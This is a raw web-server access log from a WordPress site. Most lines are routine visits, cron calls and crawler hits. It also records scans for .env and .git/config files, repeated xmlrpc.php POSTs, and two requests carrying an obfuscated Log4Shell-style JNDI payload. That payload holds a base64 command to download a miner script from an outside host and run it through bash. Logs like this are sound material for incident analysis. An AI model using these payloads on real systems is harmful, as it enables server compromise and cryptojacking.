170.106.148.137 - - [18/Aug/2025:01:59:24 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
18.233.158.73 - - [18/Aug/2025:02:05:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
91.224.92.17 - - [18/Aug/2025:02:10:30 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
87.120.191.6 - - [18/Aug/2025:02:12:44 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.62.132.25 - - [18/Aug/2025:02:37:48 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.62.132.25 - - [18/Aug/2025:02:37:51 +0800] "GET / HTTP/1.1" 200 33390 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Aug/2025:02:39:23 +0800] "POST /wp-cron.php?doing_wp_cron=1755455963.9028320312500000000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [18/Aug/2025:02:39:24 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.108.121 - - [18/Aug/2025:02:47:25 +0800] "HEAD /api/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36"
103.203.57.3 - - [18/Aug/2025:03:07:03 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
87.120.191.6 - - [18/Aug/2025:03:10:09 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.108.121 - - [18/Aug/2025:03:18:43 +0800] "HEAD /backend/.env HTTP/1.1" 404 0 "-" "Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)"
36.133.115.36 - - [18/Aug/2025:03:44:22 +0800] "POST /wp-cron.php?doing_wp_cron=1755459862.6586120128631591796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [18/Aug/2025:03:44:22 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
94.191.43.82 - - [18/Aug/2025:03:48:00 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.174.93.12 - - [18/Aug/2025:03:57:42 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
87.120.191.6 - - [18/Aug/2025:03:59:51 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
62.33.138.39 - - [18/Aug/2025:04:02:01 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/5.3.2679.68"
196.251.70.126 - - [18/Aug/2025:04:07:22 +0800] "GET /.env HTTP/1.1" 404 9422 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
196.251.70.126 - - [18/Aug/2025:04:07:23 +0800] "POST / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.115.36 - - [18/Aug/2025:04:49:28 +0800] "POST /wp-cron.php?doing_wp_cron=1755463768.0621678829193115234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [18/Aug/2025:04:49:28 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.191.6 - - [18/Aug/2025:04:52:40 +0800] "GET / HTTP/1.1" 200 33391 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.69.194 - - [18/Aug/2025:05:23:23 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [18/Aug/2025:05:39:49 +0800] "POST /wp-cron.php?doing_wp_cron=1755466789.8623499870300292968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [18/Aug/2025:05:40:09 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
87.120.191.6 - - [18/Aug/2025:05:44:55 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
206.168.34.193 - - [18/Aug/2025:05:45:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.193 - - [18/Aug/2025:05:46:08 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.193 - - [18/Aug/2025:05:48:04 +0800] "GET /security.txt HTTP/1.1" 200 19164 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
149.50.103.48 - - [18/Aug/2025:05:53:23 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.191.6 - - [18/Aug/2025:06:36:13 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Aug/2025:06:42:52 +0800] "POST /wp-cron.php?doing_wp_cron=1755470572.6626269817352294921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.101.251 - - [18/Aug/2025:06:42:52 +0800] "GET / HTTP/1.1" 200 33390 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
49.51.180.2 - - [18/Aug/2025:06:54:12 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.180.2 - - [18/Aug/2025:06:54:14 +0800] "GET / HTTP/1.1" 200 33390 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
149.50.103.48 - - [18/Aug/2025:06:57:54 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.185.249.18 - - [18/Aug/2025:07:10:17 +0800] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:17 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:18 +0800] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:19 +0800] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:19 +0800] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:20 +0800] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:21 +0800] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:21 +0800] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:22 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/new" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:23 +0800] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:23 +0800] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
35.185.249.18 - - [18/Aug/2025:07:10:24 +0800] "HEAD / HTTP/1.1" 200 0 "http://cqqizhou.com/home" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
43.159.128.237 - - [18/Aug/2025:07:19:45 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.55.158.168 - - [18/Aug/2025:07:24:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
36.133.115.36 - - [18/Aug/2025:07:41:09 +0800] "POST /wp-cron.php?doing_wp_cron=1755474069.4910109043121337890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [18/Aug/2025:07:41:09 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [18/Aug/2025:08:00:04 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.191.6 - - [18/Aug/2025:08:35:10 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Aug/2025:08:42:56 +0800] "POST /wp-cron.php?doing_wp_cron=1755477776.3740170001983642578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
58.251.94.154 - - [18/Aug/2025:08:42:56 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
58.251.94.154 - - [18/Aug/2025:08:43:18 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
149.50.103.48 - - [18/Aug/2025:09:03:24 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.44 - - [18/Aug/2025:09:12:03 +0800] "GET / HTTP/1.1" 200 152149 "-" "Go-http-client/1.1"
46.101.77.13 - - [18/Aug/2025:09:17:21 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0"
87.120.191.6 - - [18/Aug/2025:09:21:52 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.84.25 - - [18/Aug/2025:09:35:08 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [18/Aug/2025:09:45:50 +0800] "POST /wp-cron.php?doing_wp_cron=1755481550.9442260265350341796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.166.253.94 - - [18/Aug/2025:09:45:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.253.94 - - [18/Aug/2025:09:45:53 +0800] "GET / HTTP/1.1" 200 33389 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
82.156.68.74 - - [18/Aug/2025:09:48:28 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
91.224.92.17 - - [18/Aug/2025:09:50:50 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
149.50.103.48 - - [18/Aug/2025:10:01:40 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
52.167.144.170 - - [18/Aug/2025:10:07:00 +0800] "GET /contacts/ HTTP/1.1" 200 18280 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
80.75.212.83 - - [18/Aug/2025:10:10:26 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
80.75.212.83 - - [18/Aug/2025:10:10:27 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 32838 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
87.120.191.6 - - [18/Aug/2025:10:17:30 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [18/Aug/2025:10:40:12 +0800] "POST /wp-cron.php?doing_wp_cron=1755484812.2914679050445556640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.131.25.43 - - [18/Aug/2025:10:40:12 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
43.159.135.203 - - [18/Aug/2025:10:48:14 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
173.236.127.48 - - [18/Aug/2025:10:49:42 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
91.224.92.17 - - [18/Aug/2025:10:54:36 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
3.130.96.91 - - [18/Aug/2025:10:56:38 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.130.96.91 - - [18/Aug/2025:10:58:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
87.120.191.6 - - [18/Aug/2025:10:59:12 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
71.6.232.23 - - [18/Aug/2025:11:02:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
185.30.92.234 - - [18/Aug/2025:11:10:37 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
149.50.103.48 - - [18/Aug/2025:11:11:15 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.161.126.249 - - [18/Aug/2025:11:20:57 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
40.67.161.44 - - [18/Aug/2025:11:24:46 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 9422 "-" "Mozilla/5.0 zgrab/0.x"
177.52.160.32 - - [18/Aug/2025:11:32:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [18/Aug/2025:11:44:39 +0800] "POST /wp-cron.php?doing_wp_cron=1755488679.8622460365295410156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
212.147.5.172 - - [18/Aug/2025:11:44:40 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
167.172.169.37 - - [18/Aug/2025:11:46:18 +0800] "GET /.env HTTP/1.1" 404 9423 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
167.172.169.37 - - [18/Aug/2025:11:46:19 +0800] "GET /.git/config HTTP/1.1" 404 9423 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
50.6.7.29 - - [18/Aug/2025:11:57:04 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
87.120.191.6 - - [18/Aug/2025:11:58:58 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.149.187 - - [18/Aug/2025:12:09:31 +0800] "GET / HTTP/1.0" 200 152127 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
149.50.103.48 - - [18/Aug/2025:12:10:09 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
173.249.144.86 - - [18/Aug/2025:12:10:31 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
52.167.144.141 - - [18/Aug/2025:12:14:17 +0800] "GET /news/ HTTP/1.1" 200 19196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.105.128.13 - - [18/Aug/2025:12:17:13 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.105.128.13 - - [18/Aug/2025:12:17:15 +0800] "GET / HTTP/1.1" 200 33389 "http://36.133.115.36/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
103.203.56.3 - - [18/Aug/2025:12:22:01 +0800] "GET / HTTP/1.1" 301 5 "-" "HTTP Banner Detection (https://security.ipip.net)"
13.93.123.99 - - [18/Aug/2025:12:24:44 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [18/Aug/2025:12:38:46 +0800] "POST /wp-cron.php?doing_wp_cron=1755491926.7889270782470703125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
75.119.221.53 - - [18/Aug/2025:12:38:47 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
91.224.92.17 - - [18/Aug/2025:12:42:20 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
87.120.191.6 - - [18/Aug/2025:12:45:19 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
2.181.0.173 - - [18/Aug/2025:12:49:12 +0800] "GET / HTTP/1.1" 200 152149 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
153.127.18.89 - - [18/Aug/2025:12:53:59 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
94.191.43.82 - - [18/Aug/2025:12:54:54 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
94.191.43.82 - - [18/Aug/2025:12:55:03 +0800] "GET / HTTP/1.1" 200 33389 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
95.154.198.138 - - [18/Aug/2025:13:10:31 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
